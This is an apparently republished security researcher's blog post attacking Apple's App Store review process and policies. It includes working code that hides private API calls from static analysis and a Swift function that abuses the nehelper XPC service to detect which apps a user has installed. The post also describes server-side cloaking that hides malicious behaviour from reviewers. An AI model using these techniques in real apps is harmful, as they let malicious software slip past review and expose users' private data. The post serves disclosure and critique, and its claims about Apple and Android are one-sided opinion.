How malware gets into the App Store and why Apple can't stop that


Only after I published a post detailing three iOS 0-day vulnerabilities and expressing my frustration with the Apple Security Bounty Program did I receive a reply from Apple:

We saw your blog post regarding this issue and your other reports.

We apologize for the delay in responding to you. We want to let you know that we are still investigating these issues and how we can address them to protect customers. Thank you again for taking the time to report these issues to us, we appreciate your assistance.

Please let us know if you have any questions.

Indeed, I do have questions. The same ones that you have ignored. I'm going to repeat them. Why was the fix for the analyticsd vulnerability quietly included in the iOS 14.7 update but not mentioned on its security content list? Why did you promise to include it in the next update's list, then break your word not once but three times? Why do you keep ignoring these questions?

After my previous post, some people expressed doubts that such code can make its way into the App Store. It's understandable why they think so: Apple makes people believe the App Store is safe by repeating it over and over. Moreover, Apple claims that it disallows alternative stores and application sideloading to keep users safe, and that otherwise they would be in great danger. Android has alternative stores and unrestricted sideloading, yet have you heard about any security problems with Android recently? I haven't. But in the last few months alone there have been many reports about security and privacy issues on Apple platforms. The real reason Apple doesn't allow any alternatives to the App Store is the 30% commission it receives on all purchases made inside any app, a tremendously lucrative business. Apple also enacts censorship by allowing or disallowing apps based purely on the subjective opinions of its employees and managers.

So in this article I'm going to dispute the claim that the App Store is safe, voice my complaints about the App Store review process, and explain in detail (with source code) how malicious apps conceal their functionality from the App Store review team and sneak into the App Store.

Imagine that the government of some country where homosexuality is punishable by death has an official app in the App Store used by the majority of citizens, and that it wants to target people based on their sexual orientation. This can be done, for example, by checking whether a user has the Grindr app installed on their device. That government could conceal malicious code inside its official app, ship an update to the App Store, and Apple would be unable to detect it.

App Store static analysis

When a binary file of an app is uploaded to Apple's servers, it undergoes static analysis. This doesn't do much beyond checking the strings inside the binary against a predefined list of private APIs that only Apple's own apps are allowed to use. If private API usage is detected, the binary is rejected and Apple sends you an email listing what it found:

We identified one or more issues with a recent delivery for your app, [APP_NAME_AND_VERSON]. Please correct the following issues, then upload again.

ITMS-90338: Non-public API usage — The app contains or inherits from non-public classes in [APP_NAME]: GKFamiliarPlayerInternal, GKFriendPlayerInternal, GKLocalPlayerInternal. If method names in your source code match the private Apple APIs listed above, altering your method names will help prevent this app from being flagged in future submissions. In addition, note that one or more of the above APIs may be located in a static library that was included with your app. If so, they must be removed. For further information, visit the Technical Support Information at http://developer.apple.com/support/technical/

If that API is in Objective-C, it can be called dynamically through the Objective-C runtime. For example, we can obtain the class GKLocalPlayerInternal (which is used in the gamed exploit) like this: NSClassFromString("GKLocalPlayerInternal"). GKLocalPlayerInternal is on the list of private APIs, so it is searched for inside the binary. However, there are many ways to conceal it. Simply splitting it into a few parts, like NSClassFromString(["GKLoc", "lPlayerInternal"].joined(separator: "a")), is enough to evade static analysis. The gamed exploit already has all private API usage obfuscated, so it passes static analysis undetected.
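The same evasion can be sketched in plain C (the article's examples are Swift, but the principle is identical): a naive substring scan finds the contiguous class name, and misses one that is assembled from fragments at runtime.

```c
#include <stdio.h>
#include <string.h>

/* Toy model of the App Store string scan: does the "binary" contain a
 * denylisted private API name as a contiguous string? */
int scan_finds(const char *binary_bytes, const char *private_name) {
    return strstr(binary_bytes, private_name) != NULL;
}

/* Evasion: ship only the fragments and glue them together at runtime,
 * so the full name never appears contiguously in the binary. */
void build_class_name(char *out, size_t cap) {
    snprintf(out, cap, "%s%s%s", "GKLoc", "a", "lPlayerInternal");
}
```

A binary containing "GKLocalPlayerInternal" as one string is flagged, while one containing only "GKLoc" and "lPlayerInternal" passes the scan even though build_class_name reproduces the full name at runtime.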

Another way is to use a Caesar cipher. I've seen this method employed by one very popular App Store app with hundreds of millions of downloads. That app supports iOS 9, so its developers are forced to use private APIs to work around UIKit bugs and to improve the experience for people who cannot install the latest iOS version because Apple chose to deem their devices obsolete and abandon support for them.
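Here is a minimal C sketch of the Caesar-cipher variant (the actual obfuscation used by that app is unknown to me; the name and the shift of 3 are illustrative): the binary ships only the shifted form of a private API name and rotates it back just before use.

```c
/* Rotate letters by `shift` positions, preserving case and leaving
 * non-letters alone. The binary stores only "vhwFrqwlqxrxvFruqhuv";
 * decoding it with shift -3 yields "setContinuousCorners" at runtime,
 * so the private name never appears in the binary as a plain string. */
void caesar_shift(char *s, int shift) {
    for (; *s; s++) {
        if (*s >= 'a' && *s <= 'z')
            *s = 'a' + (*s - 'a' + shift + 26) % 26;
        else if (*s >= 'A' && *s <= 'Z')
            *s = 'A' + (*s - 'A' + shift + 26) % 26;
    }
}
```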

As an example, starting with iOS 7 Apple has used a special style of corner rounding for app icons. Since then it has applied that style to the corners of all UI components in its apps: buttons, alerts and so on. The style was made available to third-party developers only in iOS 13, but Apple had been using it in its own apps and system components since iOS 11 by calling a private CALayer method, setContinuousCorners. That means developers who implement custom UI components and want them to look consistent for users on old iOS versions have to use private API and violate the App Store rules.

The code for the three other vulnerabilities I've released (analyticsd, nehelper enumerate apps, nehelper wifi info) uses C functions that Apple considers part of its private API. I've just updated their source code to call those functions dynamically so that they go undetected by static analysis.

Let me explain how this is possible. There are standard functions, dlopen and dlsym, that load dynamic libraries and resolve symbols in them. Their usage might be spotted by the App Store review team, but we can avoid referencing them directly. Every iOS binary imports a symbol called dyld_stub_binder, which comes from the same library as dlopen and dlsym. That means we can measure how far these functions are from dyld_stub_binder in memory and call them using only their addresses. This is just a proof of concept, so we calculate the offsets in advance for one specific iOS version and device model, because they differ depending on both. The offsets in the GitHub repositories correspond to an iPhone 7 Plus running iOS 15.0; if they don't work for your device, recalculate them. More sophisticated malware could avoid predefined offsets and find the addresses dynamically from the functions' signatures. Here is how we can calculate these values:

// dyld_stub_binder has no header declaration; declare it so we can take its address
extern void dyld_stub_binder(void);

printf("%lld\n", (long long)dyld_stub_binder - (long long)dlopen);
printf("%lld\n", (long long)dyld_stub_binder - (long long)dlsym);

And now when we have the offsets, we can define our own functions which will call dlopen and dlsym:

// dlopen, called through its fixed distance from dyld_stub_binder;
// the offset 20780 is specific to iPhone 7 Plus / iOS 15.0
extern void dyld_stub_binder(void);

void * normal_function1(const char * arg1, int arg2) {
    return ((void *(*)(const char *, int))((long long)dyld_stub_binder - 20780))(arg1, arg2);
}

// dlsym, same technique with its own offset
void * normal_function2(void * arg1, const char * arg2) {
    return ((void *(*)(void *, const char *))((long long)dyld_stub_binder - 20648))(arg1, arg2);
}

After importing them into Swift, we can rewrite the code that checks whether an app is installed without importing or referencing any symbols except dyld_stub_binder, which the binary already imports by default:

let dylib = normal_function1("/usr/lib/system/libxpc.dylib", 0)
let normalFunction3 = unsafeBitCast(normal_function2(dylib, "xpc_connection_create_mach_service"), to: (@convention(c) (UnsafePointer<CChar>, DispatchQueue?, UInt64) -> (OpaquePointer)).self)
let normalFunction4 = unsafeBitCast(normal_function2(dylib, "xpc_connection_set_event_handler"), to: (@convention(c) (OpaquePointer, @escaping (OpaquePointer) -> Void) -> Void).self)
let normalFunction5 = unsafeBitCast(normal_function2(dylib, "xpc_connection_resume"), to: (@convention(c) (OpaquePointer) -> Void).self)
let normalFunction6 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_create"), to: (@convention(c) (OpaquePointer?, OpaquePointer?, Int) -> OpaquePointer).self)
let normalFunction7 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_set_uint64"), to: (@convention(c) (OpaquePointer, UnsafePointer<CChar>, UInt64) -> Void).self)
let normalFunction8 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_set_string"), to: (@convention(c) (OpaquePointer, UnsafePointer<CChar>, UnsafePointer<CChar>) -> Void).self)
let normalFunction9 = unsafeBitCast(normal_function2(dylib, "xpc_connection_send_message_with_reply_sync"), to: (@convention(c) (OpaquePointer, OpaquePointer) -> OpaquePointer).self)
let normalFunction10 = unsafeBitCast(normal_function2(dylib, "xpc_dictionary_get_value"), to: (@convention(c) (OpaquePointer, UnsafePointer<CChar>) -> OpaquePointer?).self)

func isAppInstalled(bundleId: String) -> Bool {
    let connection = normalFunction3("com.apple.nehelper", nil, 2)
    normalFunction4(connection, { _ in })
    normalFunction5(connection)
    let xdict = normalFunction6(nil, nil, 0)
    normalFunction7(xdict, "delegate-class-id", 1)
    normalFunction7(xdict, "cache-command", 3)
    normalFunction8(xdict, "cache-signing-identifier", bundleId)
    let reply = normalFunction9(connection, xdict)
    if let resultData = normalFunction10(reply, "result-data"), normalFunction10(resultData, "cache-app-uuid") != nil {
        return true
    }
    return false
}

Note that to stay undetected by static analysis, the strings containing function names should be obfuscated, or at least split into a few parts as I mentioned earlier. And if Apple dares to say that such things will be detected during review, I'm gonna have to come up with different ways to do it and publish them all.
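The dyld_stub_binder arithmetic only runs on iOS, but the underlying trick, reaching a function through its distance from another exported symbol instead of naming it, can be demonstrated portably with two libc functions standing in for dyld_stub_binder and dlopen (a sketch; real malware would hardcode the precomputed offset rather than measure it):

```c
#include <stdint.h>
#include <string.h>

/* Call strchr without naming it at the call site: only its distance from
 * the "anchor" symbol strlen is used. In the iOS scenario the anchor is
 * dyld_stub_binder and the offset is precomputed per device/OS version;
 * here we measure it in the same process purely for demonstration. */
char *hidden_strchr(const char *s, int c) {
    /* Offset between the two exported symbols. */
    intptr_t offset = (intptr_t)(void *)strlen - (intptr_t)(void *)strchr;
    /* Reconstruct strchr's address from the anchor and the offset. */
    char *(*fn)(const char *, int) =
        (char *(*)(const char *, int))((intptr_t)(void *)strlen - offset);
    return fn(s, c);
}
```

After stripping or obfuscating the one-time offset computation, a disassembly of the call site shows only an arithmetic expression over the anchor symbol, which is exactly why a string-based scan finds nothing.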

App Store review process

Now here is what happens when you submit your app for App Store review. You can read about it in more detail in this and this article, but basically a random reviewer downloads the app onto their iPad, taps through all the screens, and decides whether to allow it based on their own understanding of the App Store Review Guidelines, biased by their own subjective opinions and attitudes.

The first thing a malicious app can do is connect to a remote server, send details about the current user session, and ask whether it should perform the malicious action it contains. The server detects whether the app is being used by an Apple reviewer or a normal user and responds accordingly. That means a reviewer sees a totally benign app with nothing suspicious in it and accepts it into the App Store. In 2011, the developer and security researcher Charlie Miller was banned from the App Store after he built a proof-of-concept app that could steal users' photos and contacts and uploaded it to the App Store. The app passed review and appeared on the App Store; Apple never detected it until Miller himself went public and released the details of the vulnerability and the flaw in the review process. It's been 10 years, Miller is still banned, and nothing has changed: a malicious app can still easily sneak into the App Store and users' data can still be stolen. Meanwhile, when Uber was caught spying on iOS users, it was merely warned to stop. The Uber app checked whether a user was near Apple headquarters in Cupertino, and if so, the malicious code was not executed, to avoid detection by Apple employees.
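The gating logic described above can be sketched in a few lines of C. The protocol and field names here are invented for illustration, not taken from any real app; the point is that the decision lives on the server, so nothing incriminating executes during review.

```c
#include <string.h>

/* Hypothetical client-side gate: run the payload only when the server
 * says so and the device is not near Apple HQ (mimicking the reported
 * Uber geofence). Fail closed: any doubt means "behave normally". */
int payload_enabled(const char *server_verdict, int near_cupertino) {
    if (server_verdict == NULL) return 0;      /* no answer: stay benign */
    if (near_cupertino) return 0;              /* possible Apple employee */
    return strcmp(server_verdict, "on") == 0;  /* server said go */
}
```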

The App Store is also full of scam apps with fake reviews that charge users outrageous amounts of money while providing little, if any, functionality. One developer, Kosta Eleftheriou, who recently filed a lawsuit against Apple after being wronged by them, is single-handedly trying to make Apple remove all these apps, with little success, because Apple receives a 30% cut of all the money taken from the victims.

Apple’s anticompetitive practices and discrimination against developers

I had one of my own apps rejected by the App Store review team with the following message:

Your app primarily features astrology, horoscopes, palm reading, fortune telling or zodiac reports. As such, it duplicates the content and functionality of many other similar apps currently available on the App Store. While these app features may be useful, informative or entertaining, we simply have enough of these types of apps on the App Store, and they are considered a form of spam.

The app was free and had no in-app purchases, unlike the $8/week horoscope app with fake reviews mentioned in this article. It's very alarming that Apple is trying to stifle competition. I believe we might soon hear something like this:

Your app primarily features messaging. As such, it duplicates the content and functionality of many other similar apps currently available on the App Store (like Facebook Messenger) and our own very secure iMessage platform. While these app features may be useful, informative or entertaining, we simply have enough of these types of apps on the App Store, and they are considered a form of spam.

Just yesterday Apple cited the same reason when rejecting an update to an accessible game that a totally blind developer created for other visually impaired people, saying the game is similar to other apps on the App Store and is therefore considered spam. What's worse, the game was already on the App Store and people were using it, yet Apple wouldn't allow an update to be published. Why is the government doing nothing about this kind of anticompetitive behavior?

I've had more of my own problems with the review team. In 2014 I developed and uploaded to the App Store a game called Hobo Simulator. It's about a homeless person who has to survive on the street and find a job, with the final goal of becoming president. It was there for 4 years, amassing more than 800,000 downloads, until it was suddenly removed on November 30, 2018 with the following message:

We are writing to let you know about new information regarding your app, Hobo Simulator, version 1.1, currently live on the App Store. Upon re-evaluation, we found that your app is not in compliance with the App Store Review Guidelines. Specifically, we found: Safety — 1.1 Your app includes content that many users would find objectionable and offensive. For this reason, your app will be removed from sale on the App Store at this time.

My appeal was also rejected, and I received a call from an Apple employee saying that they had a problem with the word "hobo", and that they didn't like the icon and the app in general. They said they would never reinstate my app and that I should develop new apps that don't incorporate that kind of theme. However, at that time (and still today) there were quite a few similar apps on the App Store, such as "Hobo Life" and "Hobo — Real Life Simulator", featuring the same content and game mechanics, yet my app was the only one removed. When I pointed that out to the Apple employee on the phone, they said the point of the call was to inform me why my app had been removed, not to talk about other apps, and that if I had a complaint about content in other apps I should file it elsewhere. But my problem wasn't about content in other apps; it was about the review team's inconsistent application of the guidelines, which can be considered blatant discrimination against me based on my ethnicity.

After my app was removed, I found that someone had made a complete clone of it, with very similar UI and color scheme and a complete copy of all the content. My app was at the peak of its popularity, and when people searched the App Store for it, they found only that clone and downloaded it, thinking it was the one recommended by their friends. The only thing I could do was file an intellectual property complaint, so that's what I did. Apple then started a three-way email conversation between me and the developer who created the clone, revealing their email address to me in the process. The email said I should resolve the matter myself with the other developer. This can be considered a privacy flaw, because it means anyone can find out the Apple ID email associated with any App Store developer account just by filing a complaint about one of their apps. The other developer ignored the email, and when Apple contacted me a few weeks later to ask whether the matter had been resolved, I said no, and they simply removed the clone from the App Store.

In July 2020, a year and a half later, I created a new bundle ID and resubmitted my app for review. They accepted it, no questions asked. That's proof of how inconsistent they are and how they don't keep track of the apps they have removed from the App Store. For now it's still on the App Store, but we will see whether Apple decides to strike back against me and remove it.

Chosen developers possessing secret entitlements

Apple claims it's not a monopolist and that there is a viable alternative to the App Store: progressive web apps. But that's a lie. Apple makes sure PWAs stay inferior to App Store apps by limiting their performance and functionality and by disallowing alternative browser engines. Even App Store apps are severely limited in what they can do compared to Apple's own apps. But for a few chosen developers these limits are relaxed: Apple quietly makes exceptions by granting them special entitlements unavailable to regular developers.

One example of such a special entitlement is com.apple.developer.pushkit.unrestricted-voip. It's not listed in the developer documentation, and Apple doesn't grant it freely. The only ways to find out about its existence are if Apple confidentially tells you about it or if you stumble upon it while inspecting apps like WhatsApp, Signal or Telegram, which all have it. This entitlement removes the restrictions on VoIP push notifications and allows them to be used in place of regular push notifications. VoIP push notifications are vastly superior: they are delivered without delay, can automatically relaunch the app if it's not running, and more. Without this entitlement, an app that receives a VoIP notification must immediately display an incoming call interface; otherwise the app is terminated and the system stops delivering further VoIP notifications to it. Even genuine VoIP apps struggle with these restrictions, while apps holding the entitlement are unrestricted and can use VoIP notifications to deliver regular messages from other users. If you use some less popular social and messaging apps, you may have noticed that push notifications are sometimes delayed or not delivered at all, while the aforementioned apps always work perfectly. The difference is that secret entitlement. Without it, it's impossible to provide the same level of service and compete with apps given special treatment by Apple.

Even Pavel Durov, whose Telegram app relies on that VoIP entitlement to circumvent attempts by some governments to block access to the app on their territories, recently spoke out against Apple's complete control of its platform and the danger it poses to freedom of speech.

When a class-action lawsuit forced Apple to allow app developers to tell their users about alternative payment methods, it was a win. But it's not enough. We have seen that Apple refuses to protect its users, so users should at least have the ability to protect themselves. We must put pressure on Apple to open up its platform and allow alternative app stores and sideloading, giving users more control over their devices and giving developers fair treatment without corporate censorship. In the face of oppression and injustice we must stand together and fight for our freedom.

© Habrahabr.ru